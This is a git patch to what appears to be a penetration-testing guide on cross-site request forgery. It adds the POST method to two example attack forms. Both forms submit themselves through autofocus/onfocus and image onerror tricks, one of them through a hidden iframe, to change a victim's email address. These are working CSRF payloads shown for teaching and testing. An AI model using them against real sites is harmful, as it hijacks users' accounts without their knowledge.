From ac9e066bb655350125e935bb844972fefd3ced50 Mon Sep 17 00:00:00 2001
From: Matthew Prain <72017666+mdprain@users.noreply.github.com>
Date: Fri, 5 May 2023 10:24:18 +1000
Subject: [PATCH] Add missing HTML form methods for POST exploits

"Form POST request" and "Form POST request through iframe" now have the correct POST method.
---
 pentesting-web/csrf-cross-site-request-forgery.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/pentesting-web/csrf-cross-site-request-forgery.md b/pentesting-web/csrf-cross-site-request-forgery.md
index 42a1d6331..b217e1fd9 100644
--- a/pentesting-web/csrf-cross-site-request-forgery.md
+++ b/pentesting-web/csrf-cross-site-request-forgery.md
@@ -237,7 +237,7 @@ Other HTML5 tags that can be used to automatically send a GET request are:
 <html>
   <body>
   <script>history.pushState('', '', '/')</script>
-    <form action="https://victim.net/email/change-email" id="csrfform">
+    <form method="POST" action="https://victim.net/email/change-email" id="csrfform">
       <input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
       <input type="submit" value="Submit request" />
       <img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
@@ -258,7 +258,7 @@ The request is sent through the iframe withuot reloading the page
 <html>
   <body>
   <iframe style="display:none" name="csrfframe"></iframe> 
-    <form action="/change-email" id="csrfform" target="csrfframe">
+    <form method="POST" action="/change-email" id="csrfform" target="csrfframe">
       <input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
       <input type="submit" value="Submit request" />
     </form>